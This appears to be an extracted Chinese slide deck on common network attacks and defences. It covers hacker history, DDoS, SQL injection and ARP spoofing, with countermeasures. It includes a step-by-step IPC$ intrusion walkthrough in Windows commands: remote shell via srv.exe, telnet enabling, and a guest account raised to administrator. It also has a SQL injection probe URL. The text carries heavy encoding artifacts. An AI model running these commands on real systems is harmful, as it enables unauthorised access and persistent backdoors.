網(wǎng)絡(luò)攻擊的常見(jiàn)手段與防范措施

網(wǎng)絡(luò)攻擊的常見(jiàn)手段

與防范措施01什么是網(wǎng)絡(luò)安全？02網(wǎng)絡(luò)安全的主要特性目錄一、計(jì)算機(jī)網(wǎng)絡(luò)安全的概念什么是網(wǎng)絡(luò)安全？網(wǎng)絡(luò)安全：網(wǎng)絡(luò)安全是指網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及其系統(tǒng)中的數(shù)據(jù)受到保護(hù)，不因偶然的或者惡意的原因而遭受到破壞、更改、泄露，系統(tǒng)連續(xù)可靠正常地運(yùn)行，網(wǎng)絡(luò)服務(wù)不中斷。網(wǎng)絡(luò)安全的主要特性保密性信息不泄露給非授權(quán)用戶、實(shí)體或過(guò)程，或供其利用的特性。完整性數(shù)據(jù)未經(jīng)授權(quán)不能進(jìn)行改變的特性。即信息在存儲(chǔ)或傳輸過(guò)程中保持不被修改、不被破壞和丟失的特性?？捎眯钥杀皇跈?quán)實(shí)體訪問(wèn)并按需求使用的特性。即當(dāng)需要時(shí)能否存取所需的信息。例如網(wǎng)絡(luò)環(huán)境下拒絕服務(wù)、破壞網(wǎng)絡(luò)和有關(guān)系統(tǒng)的正常運(yùn)行等都屬于對(duì)可用性的攻擊；可控性對(duì)信息的傳播及內(nèi)容具有控制能力?？蓪彶樾猿霈F(xiàn)安全問(wèn)題時(shí)提供依據(jù)與手段01入侵技術(shù)的歷史和發(fā)展02一般攻擊步驟03攻擊實(shí)例與攻擊方式目錄二、常見(jiàn)的網(wǎng)絡(luò)攻擊黑客黑客是程序員，掌握操作系統(tǒng)和編程語(yǔ)言方面的知識(shí)，樂(lè)于探索可編程系統(tǒng)的細(xì)節(jié)，并且不斷提高自身能力，知道系統(tǒng)中的漏洞及其原因所在。專(zhuān)業(yè)黑客都是很有才華的源代碼創(chuàng)作者。起源：20世紀(jì)60年代目的：基于興趣非法入侵基于利益非法入侵信息戰(zhàn)KevinMitnick凱文?米特尼克是世界上最著名的黑客之一，第一個(gè)被美國(guó)聯(lián)邦調(diào)查局通緝的黑客。1979年，15歲的米特尼克和他的朋友侵入了北美空中防務(wù)指揮系統(tǒng)。莫里斯蠕蟲(chóng)（MorrisWorm）

時(shí)間1988年肇事者羅伯特·塔潘·莫里斯,美國(guó)康奈爾大學(xué)學(xué)生，其父是美國(guó)國(guó)家安全局安全專(zhuān)家機(jī)理利用sendmail,finger等服務(wù)的漏洞，消耗CPU資源，拒絕服務(wù)影響Internet上大約6000臺(tái)計(jì)算機(jī)感染，占當(dāng)時(shí)Internet聯(lián)網(wǎng)主機(jī)總數(shù)的10%，造成9600萬(wàn)美元的損失黑客從此真正變黑，黑客倫理失去約束，黑客傳統(tǒng)開(kāi)始中斷。2001年中美黑客大戰(zhàn)事件背景和經(jīng)過(guò)中美軍機(jī)南海4.1撞機(jī)事件為導(dǎo)火線4月初，以PoizonB0x、pr0phet為代表的美國(guó)黑客組織對(duì)國(guó)內(nèi)站點(diǎn)進(jìn)行攻擊，約300個(gè)左右的站點(diǎn)頁(yè)面被修改4月下旬，國(guó)內(nèi)紅（黑）客組織或個(gè)人，開(kāi)始對(duì)美國(guó)網(wǎng)站進(jìn)行小規(guī)模的攻擊行動(dòng)，4月26日有人發(fā)表了“五一衛(wèi)國(guó)網(wǎng)戰(zhàn)”戰(zhàn)前聲明，宣布將在5月1日至8日，對(duì)美國(guó)網(wǎng)站進(jìn)行大規(guī)模的攻擊行動(dòng)。各方都得到第三方支援各大媒體紛紛報(bào)道，評(píng)論，中旬結(jié)束大戰(zhàn)PoizonB0x、pr0phet更改的網(wǎng)頁(yè)中經(jīng)網(wǎng)數(shù)據(jù)有限公司中國(guó)科學(xué)院心理研究所國(guó)內(nèi)某政府網(wǎng)站國(guó)內(nèi)某大型商業(yè)網(wǎng)站國(guó)內(nèi)黑客組織更改的網(wǎng)站頁(yè)面美國(guó)勞工部網(wǎng)站美國(guó)某節(jié)點(diǎn)網(wǎng)站美國(guó)某大型商業(yè)網(wǎng)站美國(guó)某政府網(wǎng)站這次事件中采用的常用攻擊手法紅客聯(lián)盟負(fù)責(zé)人在5月9日網(wǎng)上記者新聞發(fā)布會(huì)上對(duì)此次攻擊事件的技術(shù)背景說(shuō)明如下：“我們更多的是一種不滿情緒的發(fā)泄，大家也可以看到被攻破的都是一些小站，大部分都是NT/Win2000系統(tǒng)，這個(gè)行動(dòng)在技術(shù)上是沒(méi)有任何炫耀和炒作的價(jià)值的?！敝饕捎卯?dāng)時(shí)流行的系統(tǒng)漏洞進(jìn)行攻擊這次事件中被利用的典型漏洞用戶名泄漏，缺省安裝的系統(tǒng)用戶名和密碼Unicode編碼可穿越firewall,執(zhí)行黑客指令A(yù)SP源代碼泄露可遠(yuǎn)程連接的數(shù)據(jù)庫(kù)用戶名和密碼SQLserver缺省安裝微軟Windows2000登錄驗(yàn)證機(jī)制可被繞過(guò)Bind遠(yuǎn)程溢出，Lion蠕蟲(chóng)SUNrpc.sadmind遠(yuǎn)程溢出，sadmin/IIS蠕蟲(chóng)Wu-Ftpd格式字符串錯(cuò)誤遠(yuǎn)程安全漏洞拒絕服務(wù)(syn-flood,ping)19801985199019952000密碼猜測(cè)可自動(dòng)復(fù)制的代碼密碼破解利用已知的漏洞破壞審計(jì)系統(tǒng)后門(mén)會(huì)話劫持擦除痕跡嗅探包欺騙GUI遠(yuǎn)程控制自動(dòng)探測(cè)掃描拒絕服務(wù)www攻擊工具攻擊者入侵者水平攻擊手法半開(kāi)放隱蔽掃描控制臺(tái)入侵檢測(cè)網(wǎng)絡(luò)管理DDOS攻擊2002高入侵技術(shù)的發(fā)展01入侵技術(shù)的歷史和發(fā)展02一般攻擊步驟03攻擊實(shí)例與攻擊方式目錄常見(jiàn)的攻擊方法端口掃描：網(wǎng)絡(luò)攻擊的前奏網(wǎng)絡(luò)監(jiān)聽(tīng)：局域網(wǎng)、HUB、ARP欺騙、網(wǎng)關(guān)設(shè)備郵件攻擊：郵件炸彈、郵件欺騙網(wǎng)頁(yè)欺騙：偽造網(wǎng)址、DNS重定向密碼破解：字典破解、暴力破解、md5解密漏洞攻擊：溢出攻擊、系統(tǒng)漏洞利用種植木馬：隱蔽、免殺、網(wǎng)站掛馬、郵件掛馬DoS、DDoS：拒絕服務(wù)攻擊、分布式拒絕服務(wù)攻擊cc攻擊：借助大量代理或肉雞訪問(wèn)最耗資源的網(wǎng)頁(yè)XSS跨站攻擊、SQL注入：利用變量檢查不嚴(yán)格構(gòu)造javascript語(yǔ)句掛馬或獲取用戶信息，或構(gòu)造sql語(yǔ)句猜測(cè)表、字段以及管理員賬號(hào)密碼社會(huì)工程學(xué)：QQ數(shù)據(jù)庫(kù)被盜端口判斷判斷系統(tǒng)選擇最簡(jiǎn)方式入侵分析可能有漏洞的服務(wù)獲取系統(tǒng)一定權(quán)限提升為最高權(quán)限安裝多個(gè)系統(tǒng)后門(mén)清除入侵腳印攻擊其他系統(tǒng)獲取敏感信息作為其他用途常見(jiàn)的系統(tǒng)入侵步驟IP地址、主機(jī)是否運(yùn)行、到要入侵點(diǎn)的路由、主機(jī)操作系統(tǒng)與用戶信息等。攻擊步驟1.收集主機(jī)信息

Ping命令判斷計(jì)算機(jī)是否開(kāi)著，或者數(shù)據(jù)包發(fā)送到返回需要多少時(shí)間

Tracert/Tracerout命令跟蹤從一臺(tái)計(jì)算機(jī)到另外一臺(tái)計(jì)算機(jī)所走的路徑

Finger和Rusers命令收集用戶信息

Host或者Nslookup命令，結(jié)合Whois和Finger命令獲取主機(jī)、操作系統(tǒng)和用戶等信息應(yīng)用的方法：獲取網(wǎng)絡(luò)服務(wù)的端口作為入侵通道。2.端口掃描1.TCPConnect() 2.TCPSYN3.TCPFIN 4.IP段掃瞄5.TCP反向Ident掃瞄 6.FTP代理掃瞄7.UDPICMP不到達(dá)掃瞄 7種掃瞄類(lèi)型：3、系統(tǒng)漏洞利用

一次利用ipc$的入侵過(guò)程1.C:\>netuse\\x.x.x.x\IPC$“”/user:“admintitrator”

用“流光”掃的用戶名是administrator，密碼為“空”的IP地址2.C:\>copysrv.exe\\x.x.x.x\admin$

先復(fù)制srv.exe上去，在流光的Tools目錄下3.C:\>nettime\\x.x.x.x

查查時(shí)間，發(fā)現(xiàn)x.x.x.x的當(dāng)前時(shí)間是2003/3/19上午11:00，命令成功完成。4.C:\>at\\x.x.x.x11:05srv.exe

用at命令啟動(dòng)srv.exe吧（這里設(shè)置的時(shí)間要比主機(jī)時(shí)間推后）5.C:\>nettime\\x.x.x.x

再查查時(shí)間到了沒(méi)有，如果x.x.x.x的當(dāng)前時(shí)間是2003/3/19上午11:05，那就準(zhǔn)備開(kāi)始下面的命令。6.C:\>telnetx.x.x.x99

這里會(huì)用到Telnet命令吧，注意端口是99。Telnet默認(rèn)的是23端口，但是我們使用的是SRV在對(duì)方計(jì)算機(jī)中為我們建立一個(gè)99端口的Shell。

雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個(gè)Telnet服務(wù)！這就要用到ntlm了7.C:\>copyntlm.exe\\\admin$

ntlm.exe也在《流光》的Tools目錄中

8.C:\WINNT\system32>ntlm

輸入ntlm啟動(dòng)（這里的C:\WINNT\system32>是在對(duì)方計(jì)算機(jī)上運(yùn)行當(dāng)出現(xiàn)“DONE”的時(shí)候，就說(shuō)明已經(jīng)啟動(dòng)正常。然后使用“netstarttelnet”來(lái)開(kāi)啟Telnet服務(wù))9.Telnetx.x.x.x，接著輸入用戶名與密碼就進(jìn)入對(duì)方了10.C:\>netuserguest/active:yes

為了方便日后登陸,將guest激活并加到管理組11.C:\>netuserguest1234

將Guest的密碼改為123412.C:\>netlocalgroupadministratorsguest/add

將Guest變?yōu)锳dministrator01入侵技術(shù)的歷史和發(fā)展02一般攻擊步驟03攻擊實(shí)例與攻擊方式目錄北京時(shí)間10月22日凌晨，美國(guó)域名服務(wù)器管理服務(wù)供應(yīng)商Dyn宣布，該公司在當(dāng)?shù)貢r(shí)間周五早上遭遇了DDoS（分布式拒絕服務(wù)）攻擊，從而導(dǎo)致許多網(wǎng)站在美國(guó)東海岸地區(qū)宕機(jī)，Twitter、Tumblr、Netflix、亞馬遜、Shopify、Reddit、Airbnb、PayPal和Yelp等諸多人氣網(wǎng)站無(wú)一幸免。Dyn稱，攻擊由感染惡意代碼的設(shè)備發(fā)起，來(lái)自全球上千萬(wàn)IP地址，幾百萬(wàn)惡意攻擊的源頭是物聯(lián)網(wǎng)聯(lián)系的所謂“智能”家居產(chǎn)品。1、DDoS（分布式拒絕服務(wù)）攻擊攻擊現(xiàn)象被攻擊主機(jī)上有大量等待的TCP連接；網(wǎng)絡(luò)中充斥著大量的無(wú)用的數(shù)據(jù)包；源地址為假制造高流量無(wú)用數(shù)據(jù)，造成網(wǎng)絡(luò)擁塞，使受害主機(jī)無(wú)法正常和外界通訊；利用受害主機(jī)提供的傳輸協(xié)議上的缺陷反復(fù)高速的發(fā)出特定的服務(wù)請(qǐng)求，使主機(jī)無(wú)法處理所有正常請(qǐng)求；嚴(yán)重時(shí)會(huì)造成系統(tǒng)死機(jī)。分布式拒絕服務(wù)攻擊：借助于C/S（客戶/服務(wù)器）技術(shù)，將多個(gè)計(jì)算機(jī)聯(lián)合起來(lái)作為攻擊平臺(tái)，對(duì)一個(gè)或多個(gè)目標(biāo)發(fā)動(dòng)DDoS攻擊，從而成倍地提高拒絕服務(wù)攻擊的威力分布式拒絕服務(wù)攻擊攻擊流程1、搜集資料，被攻擊目標(biāo)主機(jī)數(shù)目、地址情況，目標(biāo)主機(jī)的配置、性能，目標(biāo)的寬帶。2、是占領(lǐng)和控制網(wǎng)絡(luò)狀態(tài)好、性能好、安全管理水平差的主機(jī)做傀儡機(jī)。3、攻擊者在客戶端通過(guò)telnet之類(lèi)的常用連接軟件，向主控端發(fā)送發(fā)送對(duì)目標(biāo)主機(jī)的攻擊請(qǐng)求命令。主控端偵聽(tīng)接收攻擊命令，并把攻擊命令傳到分布端，分布端是執(zhí)行攻擊的角色，收到命令立即發(fā)起flood攻擊。

主機(jī)設(shè)置所有的主機(jī)平臺(tái)都有抵御DoS的設(shè)置，基本的有：1、關(guān)閉不必要的服務(wù)2、限制同時(shí)打開(kāi)的Syn半連接數(shù)目3、縮短Syn半連接的timeout時(shí)間4、及時(shí)更新系統(tǒng)補(bǔ)丁網(wǎng)絡(luò)設(shè)置1.防火墻禁止對(duì)主機(jī)的非開(kāi)放服務(wù)的訪問(wèn)限制同時(shí)打開(kāi)的SYN最大連接數(shù)限制特定IP地址的訪問(wèn)啟用防火墻的防DDoS的屬性嚴(yán)格限制對(duì)外開(kāi)放的服務(wù)器的向外訪問(wèn)第五項(xiàng)主要是防止自己的服務(wù)器被當(dāng)做工具去害人。2.路由器設(shè)置SYN數(shù)據(jù)包流量速率升級(jí)版本過(guò)低的ISO為路由器建立logserver防范措施雅虎作為美國(guó)著名的互聯(lián)網(wǎng)門(mén)戶網(wǎng)站，也是20世紀(jì)末互聯(lián)網(wǎng)奇跡的創(chuàng)造者之一。然而在2013年8月20日，中國(guó)雅虎郵箱宣布停止提供服務(wù)。就在大家已快將其淡忘的時(shí)候，雅虎公司突然對(duì)外發(fā)布消息，承認(rèn)在2014年的一次黑客襲擊中，至少5億用戶的數(shù)據(jù)信息遭竊。此次事件成為了有史以來(lái)規(guī)模最大的單一網(wǎng)站信息泄露事件。2、SQL注入攻擊攻擊方法SQL注入主要是由于網(wǎng)頁(yè)制作者對(duì)輸入數(shù)據(jù)檢查不嚴(yán)格，攻擊者通過(guò)對(duì)輸入數(shù)據(jù)的改編來(lái)實(shí)現(xiàn)對(duì)數(shù)據(jù)庫(kù)的訪問(wèn)，從而猜測(cè)出管理員賬號(hào)和密碼；如/view.asp?id=1；改為/view.asp?id=1anduser=‘a(chǎn)dmin’；如果頁(yè)面顯示正常，說(shuō)明數(shù)據(jù)庫(kù)表中有一個(gè)user字段，且其中有admin這個(gè)值；通過(guò)SQL注入攻擊可以探測(cè)網(wǎng)站后臺(tái)管理員賬號(hào)和密碼。SQL注入：就是通過(guò)把SQL命令插入到Web表單提交或輸入域名或頁(yè)面請(qǐng)求的查詢字符串，最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。具體來(lái)說(shuō)，它是利用現(xiàn)有應(yīng)用程序，將（惡意）的SQL命令注入到后臺(tái)數(shù)據(jù)庫(kù)引擎執(zhí)行的能力，它可以通過(guò)在Web表單中輸入（惡意）SQL語(yǔ)句得到一個(gè)存在安全漏洞的網(wǎng)站上的數(shù)據(jù)庫(kù)，而不是按照設(shè)計(jì)者意圖去執(zhí)行SQL語(yǔ)句。利用探測(cè)出的管理員賬號(hào)和密碼登陸網(wǎng)站后臺(tái)，在擁有附件上傳的功能模塊中嘗試上傳網(wǎng)頁(yè)木馬或一句話木馬（一般利用數(shù)據(jù)庫(kù)備份和恢復(fù)功能）；通過(guò)網(wǎng)頁(yè)木馬探測(cè)IIS服務(wù)器配置漏洞，找到突破點(diǎn)提升權(quán)限，上傳文件木馬并在遠(yuǎn)程服務(wù)器上運(yùn)行；通過(guò)連接木馬徹底拿到系統(tǒng)控制權(quán)；因此，SQL注入只是網(wǎng)站入侵的前奏，就算注入成功也不一定可以拿到webshell或root。1、輸入驗(yàn)證檢查用戶輸入的合法性，確信輸入的內(nèi)容只包含合法的數(shù)據(jù)。2、錯(cuò)誤消息處理防范SQL注入，還要避免出現(xiàn)一些詳細(xì)的錯(cuò)誤消息，因?yàn)楹诳蛡兛梢岳眠@些消息。要使用一種標(biāo)準(zhǔn)的輸入確認(rèn)機(jī)制來(lái)驗(yàn)證所有的輸入數(shù)據(jù)的長(zhǎng)度、類(lèi)型、語(yǔ)句、企業(yè)規(guī)則等。3、加密處理將用戶登錄名稱、密碼等數(shù)據(jù)加密保存。4、存儲(chǔ)過(guò)程來(lái)執(zhí)行所有的查詢SQL參數(shù)的傳遞方式將防止攻擊者利用單引號(hào)和連字符實(shí)施攻擊。此外，它還使得數(shù)據(jù)庫(kù)權(quán)限可以限制到只允許特定的存儲(chǔ)過(guò)程執(zhí)行，所有的用戶輸入必須遵從被調(diào)用的存儲(chǔ)過(guò)程的安全上下文，這樣就很難再發(fā)生注入式攻擊了。5、使用專(zhuān)業(yè)的漏洞掃描工具6、確保數(shù)據(jù)庫(kù)安全7、安全審評(píng)防范措施3、ARP攻擊ARP（AddressResolutionProtocol，地址解析協(xié)議）是根據(jù)IP地址獲取物理地址的一個(gè)TCP/IP協(xié)議。ARP攻擊就是通過(guò)偽造IP地址和MAC地址實(shí)現(xiàn)ARP欺騙，能夠在網(wǎng)絡(luò)中產(chǎn)生大量的ARP通信量使網(wǎng)絡(luò)阻塞，攻擊者只要持續(xù)不斷的發(fā)出偽造的ARP響應(yīng)包就能更改目標(biāo)主機(jī)ARP緩存中的IP-MAC條目，造成網(wǎng)絡(luò)中斷或中間人攻擊。ARP攻擊僅能在局域網(wǎng)內(nèi)進(jìn)行。ARP請(qǐng)求包是以廣播的形式發(fā)出，正常情況下只有正確IP地址的主機(jī)才會(huì)發(fā)出ARP響應(yīng)包，告知查詢主機(jī)自己的MAC地址。局域網(wǎng)中每臺(tái)主機(jī)都維護(hù)著一張ARP表，其中存放著<IP—MAC>地址對(duì)。ARP改向的中間人竊聽(tīng)A發(fā)往B：(MACb，MACa，PROTOCOL，DATA)B發(fā)往A：(MACa，MACb，PROTOCOL，DATA)A發(fā)往B：(MACx，MACa，PROTOCOL，DATA)B發(fā)往A：(MACx，MACb，PROTOCOL，DATA)原理：X分別向A和B發(fā)送ARP包，促使其修改ARP表主機(jī)A的ARP表中B為<IPb—MACx>主機(jī)B的ARP表中A為<IPa—MACx>X成為主機(jī)A和主機(jī)B之間的“中間人”，可以選擇被動(dòng)地監(jiān)測(cè)流量，獲取密碼和其他涉密信息，也可以偽造數(shù)據(jù)，改變電腦A和電腦B之間的通信內(nèi)容。防范措施：網(wǎng)關(guān)和終端雙向綁定IP和MAC地址。局域網(wǎng)中的每臺(tái)電腦中進(jìn)行靜態(tài)ARP綁定。打開(kāi)安全防護(hù)軟件的ARP防火墻功能。徹底追蹤查殺ARP病毒。01常見(jiàn)的